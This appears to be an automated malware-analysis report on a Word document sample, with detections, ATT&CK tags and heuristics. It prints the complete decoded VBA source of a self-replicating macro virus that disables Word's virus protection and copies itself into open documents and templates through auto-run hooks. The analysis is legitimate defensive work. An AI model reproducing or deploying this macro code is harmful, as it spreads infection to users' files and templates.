MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including AutoOpen and AutoClose, which are indicative of malicious intent. The script attempts to copy its macros to other open documents and templates, suggesting a worm-like behavior to spread infection. The presence of ClamAV detections like 'Doc.Trojan.CopyTest-1' and 'Win.Trojan.Alicia-3' further confirms its malicious nature.
Heuristics 5
-
ClamAV: Doc.Trojan.CopyTest-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.CopyTest-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2393 bytes |
SHA-256: 9911413c8dcfeea0939e9e396365238c1d88c373bf977cd036193f7d27aabf7c |
|||
|
Detection
ClamAV:
Win.Trojan.Alicia-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Infect"
Sub MAIN()
myname = ThisDocument.FullName
Word.Options.VirusProtection = False
For Each d In Word.Documents
If (d.FullName <> myname) Then
Debug.Print myname + " -> " + d.FullName
Call CopyMacros(myname, d.FullName)
End If
Next d
For Each t In Word.Templates
If (t.FullName <> myname) Then
Call CopyMacros(myname, t.FullName)
End If
Next t
Rem Application.OrganizerCopy "d:\test2.doc", "d:\test1.doc", "Test", 3
End Sub
Sub CopyMacros(ByVal s As String, ByVal d As String)
On Error GoTo AlreadyInfected
Application.OrganizerCopy s, d, "Infect", wdOrganizerObjectProjectItems
Application.OrganizerCopy s, d, "AutoClose", wdOrganizerObjectProjectItems
Application.OrganizerCopy s, d, "AutoExec", wdOrganizerObjectProjectItems
Application.OrganizerCopy s, d, "AutoOpen", wdOrganizerObjectProjectItems
Application.OrganizerCopy s, d, "AutoExit", wdOrganizerObjectProjectItems
Application.OrganizerCopy s, d, "FileClose", wdOrganizerObjectProjectItems
Application.OrganizerCopy s, d, "FileSave", wdOrganizerObjectProjectItems
Application.OrganizerCopy s, d, "FileSaveAs", wdOrganizerObjectProjectItems
AlreadyInfected:
End Sub
Sub SaveDoc()
If (Application.ActiveDocument.Saved = False) Then
If (Application.ActiveDocument.Path <> "") Then
Application.ActiveDocument.Save
End If
End If
End Sub
Attribute VB_Name = "AutoClose"
Sub MAIN()
Infect.MAIN
Infect.SaveDoc
End Sub
Attribute VB_Name = "AutoExec"
Sub MAIN()
Infect.MAIN
End Sub
Attribute VB_Name = "AutoOpen"
Sub MAIN()
Infect.MAIN
End Sub
Attribute VB_Name = "AutoExit"
Sub MAIN()
Infect.MAIN
End Sub
Attribute VB_Name = "FileClose"
Sub MAIN()
Infect.MAIN
Infect.SaveDoc
End Sub
Attribute VB_Name = "FileSave"
Sub MAIN()
Infect.MAIN
End Sub
Attribute VB_Name = "FileSaveAs"
Sub MAIN()
Infect.MAIN
Word.Dialogs(wdDialogFileSaveAs).Show
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.